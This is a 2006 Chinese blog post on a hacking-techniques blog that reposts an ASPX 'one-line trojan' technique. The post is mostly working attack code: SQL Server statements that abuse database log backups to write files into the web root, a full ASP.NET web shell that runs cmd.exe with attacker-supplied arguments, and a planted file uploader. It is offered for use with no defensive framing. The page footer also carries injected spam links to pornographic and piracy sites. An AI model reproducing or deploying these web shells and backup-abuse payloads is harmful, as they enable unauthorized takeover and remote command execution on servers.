酒水不犯茶水
葉的離去,是風的追求還是樹的不挽留?
BlogJava
|
首頁
|
發新隨筆
|
發新文章
|
聯系
|
聚合
|
管理
隨筆:325 文章:0 評論:612 引用:0
aspx的一句話木馬
from:Security Box
1.相當于ASP的一句話木馬:
1
alter
?
database
?pubs?
set
?RECOVERY?
FULL
--
2
create
?
table
?pubs.dbo.cmd(a?
image
)
3
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\TM
'
?
with
?init
4
insert
?
into
?pubs.dbo.cmd(a)?
values
?(
'
<%@?Page?Language="C#"?validateRequest="false"?%><%System.IO.StreamWriter?ow=new?System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%>?
'
)
5
backup
?
log
?pubs?
to
?
disk
?
=
?
'
d:\test11.aspx
'
mu.aspx.htm 客戶端:(提交后訪問:http://IP/images.aspx)
?1
<
form?
action
=http://192.168.2.100/asp/mu.aspx?
method
=post
>
?
?2
<
b
>
在下面輸入大馬內容:
</
b
><
br
>
?3
<
textarea?
name
=l?
cols
=120?
rows
=35?
width
=45
>
?
?4
<%
@?Page?Language
=
"
VB
"
?Debug
=
"
true
"
?
%>
?5
<%
@?import?Namespace
=
"
system.IO
"
?
%>
?6
<%
@?import?Namespace
=
"
System.Diagnostics
"
?
%>
?7
<
script?
runat
="server"
>
?
?8
????Sub?RunCmd(Src?As?Object,?E?As?EventArgs)?
?9
????????Dim?myProcess?As?New?Process()?
10
????????Dim?myProcessStartInfo?As?New?ProcessStartInfo(xpath.Text)?
11
????????myProcessStartInfo.UseShellExecute?
=
?False?
12
????????myProcessStartInfo.RedirectStandardOutput?
=
?
true
?
13
????????myProcess.StartInfo?
=
?myProcessStartInfo?
14
????????myProcessStartInfo.Arguments
=
xCmd.text
15
????????myProcess.Start()
16
????????Dim?myStreamReader?As?StreamReader?
=
?myProcess.StandardOutput?
17
????????Dim?myString?As?String?
=
?myStreamReader.Readtoend()
18
????????myProcess.Close()
19
????????mystring
=
replace(mystring,
"
<
"
,
"
<
"
)
20
????????mystring
=
replace(mystring,
"
>
"
,
"
>
"
)
21
????????result.text
=
?vbcrlf?
&
?
"
<pre>
"
?
&
?mystring?
&
?
"
</pre>
"
22
????End?Sub?
23
</
script
>
24
<
html
><
head
>
25
<
title
>
ASP.NET?Shell?for?WebAdmin2.X?Final
</
title
>
26
<
meta?
http-equiv
="Content-Type"
?c?
/></
head
><
body
>
27
<
form?
runat
="server"
>
28
<
asp:Label?
id
="L_p"
?style
="COLOR:?#0000ff"
?runat
="server"
?width
="80px"
>
;Program
</
asp:Label
>
29
<
asp:TextBox?
id
="xpath"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?BORDER-BOTTOM:?#084b8e?1px?solid"
?runat
="server"
?Width
="300px"
>
c:\windows\system32\cmd.exe
</
asp:TextBox
><
br?
/>
30
<
asp:Label?
id
="L_a"
?style
="COLOR:?#0000ff"
?runat
="server"
?width
="80px"
>
Arguments
</
asp:Label
>
31
<
asp:TextBox?
id
="xcmd"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?BORDER-BOTTOM:?#084b8e?1px?solid"
?runat
="server"
?Width
="300px"
?Text
="/c?net?user"
>
/c?net?user
</
asp:TextBox
><
br?
/>
32
<
asp:Button?
id
="Button"
?style
="BORDER-RIGHT:?#084b8e?1px?solid;?BORDER-TOP:?#084b8e?1px?solid;?BORDER-LEFT:?#084b8e?1px?solid;?COLOR:?#ffffff;?BORDER-BOTTOM:?#084b8e?1px?solid;?BACKGROUND-COLOR:?#719bc5"
?runat
="server"
?Width
="100px"
?Text
="Run"
></
asp:Button
><
p
>
33
<
asp:Label?
id
="result"
?style
="COLOR:?#0000ff"
?runat
="server"
></
asp:Label
>
?
</
p
></
form
></
body
></
html
>
34
</
textarea
><
BR
><
center
><
br
>
?
35
<
input?
type
=submit?
value
=提交
>
2、下面這個是我找網上的asp.net的上傳文件程序,修改精簡了下,也可以用:
1
drop
?
table
?pubs.dbo.cmd
2
alter
?
database
?pubs?
set
?RECOVERY?
FULL
3
create
?
table
?pubs.dbo.cmd(a?
image
)
4
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\TM
'
?
with
?init
5
insert
?
into
?pubs.dbo.cmd(a)?
values
?(
'
<script?language="c#"?runat="server">private?void?bc(object?o,EventArgs?e)?{string?u="files";string?filename;int?pos=f.PostedFile.FileName.LastIndexOf("\\");filename=f.PostedFile.FileName.Substring(pos?+?1);f.PostedFile.SaveAs(Server.MapPath(u)+"\\"+filename);}</script><form?method="post"?runat="server"><input?type="file"?id="f"?runat="server"/><input?type="submit"?value="ss"?runat="Server"?/></form>
'
)
6
backup
?
log
?pubs?
to
?
disk
?
=
?
'
c:\inetpub\wwwroot\test11.aspx
'
發表于 2006-11-28 00:25
009
閱讀(6184)
評論(0)
編輯
收藏
所屬分類:
黑客技術
新用戶注冊
刷新評論列表
只有注冊用戶
登錄
后才能發表評論。
網站導航:
博客園
IT新聞
Chat2DB
C++博客
博問
管理
相關文章:
小米手環分析
Sniffing Proprietary 2.4GHz Signals
打算做個HackRF
使用xgoldmon項目調試監控本機通信
OsmocomBB項目
Raspberry Pi 增加TFT顯示
TVB-Gone 紅外編碼方法(每次都重新推算一遍,年紀大了還是記錄一下吧)
Raspberry Pi 入手安裝配置 (有圖有真相)
無線鍵盤監聽(更新 LCD 1602)
遭受 MSN D.o.S
<
2006年11月
>
日
一
二
三
四
五
六
29
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
公告
常用鏈接
我的隨筆
我的評論
我的參與
最新評論
留言簿
(113)
給我留言
查看公開留言
查看私人留言
隨筆分類
2D & 3D(14)
(rss)
ajax(3)
(rss)
OTHERS(82)
(rss)
UNIX(27)
(rss)
兄弟(2)
(rss)
系統編程(85)
(rss)
經驗技巧(51)
(rss)
網絡資源(8)
(rss)
網頁編程(20)
(rss)
黑客技術(88)
(rss)
隨筆檔案
2021年11月 (1)
2019年7月 (1)
2018年11月 (1)
2016年2月 (1)
2015年9月 (1)
2015年5月 (1)
2015年4月 (2)
2014年10月 (1)
2014年6月 (1)
2014年5月 (1)
2014年3月 (3)
2013年11月 (2)
2013年9月 (1)
2013年6月 (1)
2013年5月 (1)
2013年4月 (1)
2012年12月 (1)
2012年11月 (1)
2012年10月 (1)
2012年8月 (1)
2012年7月 (1)
2012年5月 (2)
2012年4月 (1)
2012年3月 (1)
2011年12月 (3)
2011年11月 (2)
2011年10月 (2)
2011年7月 (2)
2011年2月 (1)
2010年11月 (2)
2010年6月 (2)
2010年5月 (1)
2010年3月 (1)
2010年2月 (1)
2010年1月 (1)
2009年11月 (1)
2009年10月 (2)
2009年9月 (2)
2009年7月 (1)
2009年4月 (1)
2009年2月 (1)
2009年1月 (1)
2008年12月 (1)
2008年10月 (5)
2008年9月 (9)
2008年8月 (6)
2008年7月 (5)
2008年6月 (2)
2008年5月 (8)
2008年4月 (4)
2008年3月 (6)
2008年2月 (5)
2008年1月 (4)
2007年12月 (22)
2007年11月 (15)
2007年10月 (3)
2007年9月 (11)
2007年8月 (40)
2007年7月 (16)
2007年6月 (5)
2007年5月 (16)
2007年4月 (15)
2007年3月 (15)
2007年2月 (4)
2007年1月 (3)
2006年12月 (22)
2006年11月 (14)
文章分類
系統編程
(rss)
網絡資源
(rss)
網頁編程
(rss)
黑客技術
(rss)
相冊
080512汶川大地震
20130405
mypic
taobao
ubuntu
W810C
手工
畫畫兒
草莓音樂節
Link
動力老男孩
(rss)
愛上DIY
搜索
最新評論
1.?re: OsmocomBB項目
@zhou-xuelin
哇~~~多謝多謝?。?!
--009
2.?re: OsmocomBB項目
評論內容較長,點擊標題查看
--zhou-xuelin
3.?re: OsmocomBB項目
我的顯示未發現libncurse 軟件包是什么原因呢
--HYH
4.?re: 樓上 惡鄰 小孩 奔跑 咚咚咚
樓下一群跳廣場舞的怎么辦?還天天循環播放那幾首低俗歌
--斗魚
5.?re: 小米手環分析[未登錄]
沒看到鬧鐘的內容,根據鬧鐘和震動提醒功能,可以做一些應用。
--kim
閱讀排行榜
1.?OsmocomBB項目(52245)
2.?Unicode編碼表/0000-0FFF(19458)
3.?水果機密碼解碼 "密碼公式" 看了就知道怎么打暴機了(ZT)(17701)
4.?打算做個HackRF(17290)
5.?Raspberry Pi 入手安裝配置 (有圖有真相)(15000)
評論排行榜
1.?OsmocomBB項目(118)
2.?打算做個HackRF(18)
3.?無線鍵盤監聽(更新 LCD 1602)(15)
4.?Token Kidnapping Windows 2003 PoC exploit (Win2K3測試成功)(13)
5.?我是007加密后的軟件密碼破解(13)
Powered by:
博客園
模板提供:
滬江博客
Copyright ©2025 009
2006 ©
009網站
版權沒有,任意拷貝
如有意見和建議,請 E-mail 至
baicker@hotmail.com
建議使用
Firefox & 微軟雅黑字體
進行瀏覽,最佳顯示
1400*1050
主站蜘蛛池模板:
岛国片在线免费观看
|
亚洲精品无码专区2
|
我要看WWW免费看插插视频
|
无码专区一va亚洲v专区在线
|
亚洲AV综合色区无码另类小说
|
久久国产福利免费
|
大地资源二在线观看免费高清
|
成人片黄网站色大片免费观看APP
|
91在线老王精品免费播放
|
免费看国产曰批40分钟
|
猫咪免费人成在线网站
|
中文字幕在线亚洲精品
|
亚洲熟妇av午夜无码不卡
|
青青草国产免费久久久下载
|
亚洲hairy多毛pics大全
|
日韩免费电影网址
|
亚洲最大福利视频网站
|
岛国精品一区免费视频在线观看
|
男女交性永久免费视频播放
|
亚洲伦乱亚洲h视频
|
eeuss草民免费
|
国产福利免费观看
|
亚洲国产成人久久77
|
国内精品乱码卡1卡2卡3免费
|
亚洲大片在线观看
|
噼里啪啦免费观看高清动漫4
|
亚洲精品女同中文字幕
|
jlzzjlzz亚洲乱熟在线播放
|
久久久精品午夜免费不卡
|
亚洲国产成人手机在线电影bd
|
美女被免费视频网站a国产
|
av电影在线免费看
|
亚洲黄网在线观看
|
成人永久免费福利视频网站
|
亚洲Av高清一区二区三区
|
国产老女人精品免费视频
|
亚欧乱色国产精品免费视频
|
亚洲美女激情视频
|
四虎影视在线永久免费观看
|
99在线热播精品免费99热
|
国内精品99亚洲免费高清
|